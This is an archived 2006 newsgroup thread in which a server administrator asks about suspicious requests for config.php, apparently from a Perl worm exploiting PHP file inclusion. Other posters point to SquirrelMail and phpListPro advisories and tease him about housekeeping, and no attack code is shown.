Posted by Ignoramus6539 on 08/30/06 19:47

On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <colin.thisisnotmysurname@ntlworld.deletemeunlessURaBot.com> wrote:
> Ignoramus6539 wrote:
>
>> There were some strange requests to my server asking for config.php
>> file (which I do not have in the requested location).
>>
>
> Nice one Ignoramus6539
>
>> I did some investigation. Seems to be a virus written in perl,
>> exploiting a vulnerability in php code.
>>
>
> Sure looks like it. Is anyone daft enough to include($get_parameter)?

I think that the get parameter was mentioned in the access_log line.

>> I did a locate command on my fedora systems and found config.php in
>> some package called 'squirrelmail'. Which I immediately deleted, even
>> though it was not accessible through the web, just sitting there, but
>> I just do not want it.
>>
> Oooh. "Some package called...' sloppy housekeeping!

Yep. Point taken.

> Actually, although Squirrelmail was vulnerable to this kind of attack
> (http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
> http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
> the developers are relatively good about releasing fixes.
>
> Your attacker seems to be looking for phpListPro
> (http://www.frsirt.com/english/advisories/2006/1325).
>
> Usually script kiddies don't look to see what you're running before
> unleashing all their dogs on your servers.

Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.

>> My main question is, just what package or program owns config.php that
>> si vulnerable. It is a generic file name, so I would not be so quick
>> to suspect squirrelmail.
>>
> Next time try Google first :) and give us a URL for the code.

Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.

i

[Back to original message]